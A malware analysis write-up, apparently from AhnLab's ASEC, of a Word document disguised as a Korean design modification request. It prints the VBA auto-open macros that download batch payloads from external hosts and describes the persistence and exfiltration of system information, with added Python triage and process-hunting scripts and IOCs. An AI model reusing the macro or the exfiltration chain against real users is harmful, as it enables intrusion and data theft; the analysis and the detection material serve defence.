Word File Disguised as a Design Modification Request for Information Theft

The ASEC analysis team has discovered the distribution of a malicious Word file targeting Korean users. The file, named Design Modification Request.doc, contains an image that prompts the user to enable the macro.

Figure 1. Image in the Word file


Figure 2. File information of Design Modification Request.doc


As shown below, the Word file contains a malicious macro that downloads additional files from hxxp://filedownloaders.com/doc09. When the user clicks Enable Content, the macro runs automatically and downloads the additional malicious files.

Sub Document_Open()
    Dim RetVal As Long

    ' download_func wraps a file-download routine; its declaration is not part of the quoted excerpt
    RetVal = download_func(0, "hxxp://filedownloaders[.]com/doc09/no6.txt", "C:\Users\Public\Documents\no1.bat", 0, 0)
    RetVal = download_func(0, "hxxp://filedownloaders[.]com/doc09/vbs6.txt", "C:\Users\Public\Documents\setup.cab", 0, 0)
    RetVal = download_func(0, "hxxp://filedownloaders[.]com/doc09/temp0101.doc", "C:\Users\Public\Documents\temp.doc", 0, 0)

    ' Open the downloaded temp.doc in a new Word instance so that its own Document_Open macro runs
    Dim OpenDoc: Set OpenDoc = CreateObject("Word.Application")
    OpenDoc.Visible = True
    Dim WorkDone: Set WorkDone = OpenDoc.Documents.Open("C:\Users\Public\Documents\temp.doc")
End Sub

It then opens the downloaded temp.doc. That document contains text written to pass as a document from a Korean company.

Figure 3. Text within temp.doc


Figure 4. Information of temp.doc file

Sub Document_Open()
   ' Launch the first-stage batch file downloaded by the parent document; 0 (SW_HIDE) keeps the window hidden
   WinExec "C:\Users\Public\Documents\no1.bat", 0
End Sub
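The two macros quoted above share the traits a defender looks for when triaging Office documents: an auto-executing entry point, hard-coded download URLs, drop paths under C:\Users\Public, and a primitive that launches something (CreateObject("Word.Application"), WinExec). As an added example, which is not part of the ASEC analysis and not AhnLab's detection logic, the following Python script runs those heuristics over the two macros embedded as strings (URLs kept defanged). The regular expressions, weights and verdict thresholds are my own assumptions.

```python
import re

# Constructed input: the two Document_Open macros quoted in the analysis above,
# embedded as strings (URLs kept defanged) so the triage runs offline.
STAGE1_MACRO = r'''
Sub Document_Open()
    Dim RetVal As Long
    RetVal = download_func(0, "hxxp://filedownloaders[.]com/doc09/no6.txt", "C:\Users\Public\Documents\no1.bat", 0, 0)
    RetVal = download_func(0, "hxxp://filedownloaders[.]com/doc09/vbs6.txt", "C:\Users\Public\Documents\setup.cab", 0, 0)
    RetVal = download_func(0, "hxxp://filedownloaders[.]com/doc09/temp0101.doc", "C:\Users\Public\Documents\temp.doc", 0, 0)
    Dim OpenDoc: Set OpenDoc = CreateObject("Word.Application")
    OpenDoc.Visible = True
    Dim WorkDone: Set WorkDone = OpenDoc.Documents.Open("C:\Users\Public\Documents\temp.doc")
End Sub
'''

STAGE2_MACRO = r'''
Sub Document_Open()
   WinExec "C:\Users\Public\Documents\no1.bat", 0
End Sub
'''

# Heuristic patterns (my own assumptions, not AhnLab's detection logic).
AUTOEXEC = re.compile(r'\bSub\s+(Document_Open|AutoOpen|Auto_Open|Workbook_Open|Document_Close|AutoClose)\b', re.I)
# Accepts live and defanged schemes (http, https, hxxp, hxxps).
URL = re.compile(r'\bh[tx]{2}ps?://[^\s"\']+', re.I)
# Quoted Windows paths under locations commonly used as drop sites because any user can write there.
DROP_PATH = re.compile(r'"([A-Za-z]:\\[^"]*?(?:Public|ProgramData|Temp|AppData)\\[^"]+)"', re.I)
# Primitives that execute code or fetch content from outside the document.
EXEC_PRIM = re.compile(r'\b(WinExec|ShellExecute|Shell|CreateObject|URLDownloadToFile)\b', re.I)

WEIGHTS = {"autoexec": 1, "urls": 2, "drop_paths": 1, "exec_primitives": 1}


def triage_macro(src: str) -> dict:
    """Return the indicators found in VBA source plus a simple weighted score."""
    findings = {
        "autoexec": sorted({m.group(1) for m in AUTOEXEC.finditer(src)}),
        "urls": sorted({m.group(0) for m in URL.finditer(src)}),
        "drop_paths": sorted({m.group(1) for m in DROP_PATH.finditer(src)}),
        "exec_primitives": sorted({m.group(1) for m in EXEC_PRIM.finditer(src)}),
    }
    # Each category counts once, however many matches it produced.
    findings["score"] = sum(w for k, w in WEIGHTS.items() if findings[k])
    findings["verdict"] = ("likely downloader" if findings["score"] >= 4
                           else "suspicious" if findings["score"] >= 2
                           else "no macro indicators")
    return findings


if __name__ == "__main__":
    for name, src in (("stage1", STAGE1_MACRO), ("stage2", STAGE2_MACRO)):
        r = triage_macro(src)
        print(f"{name}: {r['verdict']} (score {r['score']})")
        for key in ("autoexec", "urls", "drop_paths", "exec_primitives"):
            for item in r[key]:
                print(f"  {key}: {item}")
```

The first-stage macro scores on all four categories, the temp.doc macro on three (no URL, since it only launches the batch file that the first stage already dropped). In practice the VBA source would come from a macro extractor such as olevba rather than from a string literal; the scoring is deliberately coarse and is meant to prioritise documents for analyst review, not to replace AV.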

no1.bat, launched by the Word document, runs vvire.bat. If vvire.bat does not exist, it first extracts the setup.cab file that was downloaded from hxxp://filedownloaders.com/doc09/vbs6.txt, then runs vvire.bat.

Figure 3. Inside no1.bat file

vvire.bat adds a registry entry, runs the no4.bat file, and downloads additional files.

Figure 4. Inside vvire.bat


It registers the Start.vbs file in the registry so that vvire.bat runs automatically, and after running no4.bat, it deletes no1.bat. It then checks whether a certain file exists, downloads additional files from hxxp://senteroman.com/dow11/%COMPUTERNAME%.txt, and runs them. That file could not be examined because it is currently unavailable for download.

The figure below shows the Start.vbs file.

Figure 5. Inside Start.vbs


no4.bat, launched by vvire.bat, collects the following information about the user's PC and exfiltrates it to hxxp://senteroman.com/upl11/upload.php.

  • C:\Users\%username%\downloads\ list
  • C:\Users\%username%\documents\ list
  • C:\Users\%username%\desktop\ list
  • C:\Program Files\ list
  • IP information
  • tasklist
  • systeminfo

When no4.bat runs, the files holding the collected information are created in the C:\Users\Public\Documents\ folder, and once that information has been uploaded, it creates the upok.txt file.
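The chain described in the preceding paragraphs (Word document, then no1.bat, vvire.bat, a registry entry for Start.vbs, no4.bat, and finally tasklist and systeminfo) leaves a recognisable process tree on the endpoint. As an added example, which is not from the ASEC write-up or any AhnLab product, the following Python hunts for that pattern over constructed process-creation events. The event field names, the rule names, and the HKCU Run key used for the Start.vbs entry are my assumptions (the write-up only says the file is "added to registry").

```python
import re
from collections import defaultdict

# Constructed process-creation events modelled on the chain described above.
# Field names are generic (not a particular EDR schema); the Run key path is an assumption.
WINWORD = r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
CMD = r"C:\Windows\System32\cmd.exe"
NO1 = r'cmd.exe /c "C:\Users\Public\Documents\no1.bat"'
VVIRE = r'cmd.exe /c "C:\Users\Public\Documents\vvire.bat"'
NO4 = r'cmd.exe /c "C:\Users\Public\Documents\no4.bat"'

EVENTS = [
    {"host": "ws01", "pid": 4100, "image": WINWORD, "parent_image": r"C:\Windows\explorer.exe",
     "parent_cmdline": "explorer.exe",
     "cmdline": r'"WINWORD.EXE" "C:\Users\alice\Downloads\Design Modification Request.doc"'},
    {"host": "ws01", "pid": 4300, "image": CMD, "parent_image": WINWORD, "parent_cmdline": "WINWORD.EXE", "cmdline": NO1},
    {"host": "ws01", "pid": 4310, "image": CMD, "parent_image": CMD, "parent_cmdline": NO1, "cmdline": VVIRE},
    {"host": "ws01", "pid": 4320, "image": r"C:\Windows\System32\reg.exe", "parent_image": CMD, "parent_cmdline": VVIRE,
     "cmdline": r'reg.exe add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Start /t REG_SZ /d "C:\Users\Public\Documents\Start.vbs" /f'},
    {"host": "ws01", "pid": 4330, "image": CMD, "parent_image": CMD, "parent_cmdline": VVIRE, "cmdline": NO4},
    {"host": "ws01", "pid": 4340, "image": r"C:\Windows\System32\tasklist.exe", "parent_image": CMD, "parent_cmdline": NO4, "cmdline": "tasklist"},
    {"host": "ws01", "pid": 4350, "image": r"C:\Windows\System32\systeminfo.exe", "parent_image": CMD, "parent_cmdline": NO4, "cmdline": "systeminfo"},
    # Benign activity on another host: a user's own build script and its tasklist call.
    {"host": "ws02", "pid": 777, "image": CMD, "parent_image": r"C:\Windows\explorer.exe", "parent_cmdline": "explorer.exe",
     "cmdline": r'cmd.exe /c "C:\Users\bob\build.bat"'},
    {"host": "ws02", "pid": 780, "image": r"C:\Windows\System32\tasklist.exe", "parent_image": CMD,
     "parent_cmdline": r'cmd.exe /c "C:\Users\bob\build.bat"', "cmdline": "tasklist"},
]

OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe"}
INTERPRETERS = {"cmd.exe", "wscript.exe", "cscript.exe", "powershell.exe", "mshta.exe"}
RECON = {"tasklist.exe", "systeminfo.exe", "ipconfig.exe", "whoami.exe"}
PUBLIC_SCRIPT = re.compile(r'\\Users\\Public\\[^\s"]*\.(?:bat|cmd|vbs|js|ps1)\b', re.I)
RUN_KEY = re.compile(r'\\CurrentVersion\\Run(?:Once)?\b', re.I)
SCRIPT_EXT = re.compile(r'\.(?:bat|cmd|vbs|js|ps1)\b', re.I)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def evaluate(ev: dict) -> list:
    """Return the names of the rules a single process-creation event triggers."""
    img, parent, cmd = basename(ev["image"]), basename(ev["parent_image"]), ev["cmdline"]
    hits = []
    if parent in OFFICE and img in INTERPRETERS:
        hits.append("office_spawns_interpreter")          # temp.doc macro launching no1.bat
    if img in INTERPRETERS and PUBLIC_SCRIPT.search(cmd):
        hits.append("script_in_public_dir")               # no1.bat / vvire.bat / no4.bat
    if img == "reg.exe" and RUN_KEY.search(cmd) and SCRIPT_EXT.search(cmd):
        hits.append("run_key_script_persistence")         # autorun entry for Start.vbs
    if img in RECON and parent == "cmd.exe" and PUBLIC_SCRIPT.search(ev["parent_cmdline"]):
        hits.append("recon_from_public_script")           # tasklist / systeminfo run by no4.bat
    return hits


def hunt(events: list) -> dict:
    """Evaluate every event and flag hosts on which at least three distinct rules fired."""
    alerts, rules_per_host = [], defaultdict(set)
    for ev in events:
        for rule in evaluate(ev):
            alerts.append((ev["pid"], rule))
            rules_per_host[ev["host"]].add(rule)
    chains = sorted(h for h, rules in rules_per_host.items() if len(rules) >= 3)
    return {"alerts": alerts, "chains": chains}


if __name__ == "__main__":
    result = hunt(EVENTS)
    for pid, rule in result["alerts"]:
        print(f"pid {pid}: {rule}")
    print("hosts with a probable macro-downloader chain:", result["chains"])
```

Each rule on its own is noisy (administrators do run batch files and tasklist), which is why the hunt only escalates a host once several independent stages of the chain have been observed there; the per-event alerts are still kept so an analyst can reconstruct the order of events. Sysmon event ID 1 or an EDR's process telemetry supplies the same fields as the constructed records.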

Figure 6. List of created files


Malicious documents disguised as legitimate files that prompt the user to enable macros, such as this malware, are consistently being distributed, so users must stay vigilant. Users should also configure Office so that macros inside documents do not run automatically, and refrain from opening suspicious documents.

[V3 Detection]

  • Downloader/DOC.Generic

MD5

66384f5091583b0c389918d5c8522cd6
d2732f2c6f8531e812053e6252c421cf
d6358ce7399df51138f89c74f408c5a9
dc7fda2a036016cca23f2867e644682c

URL

http[:]//senteroman[.]com/upl11/upload[.]php

Gain access to related IOCs and detailed analysis by subscribing to AhnLab TIP.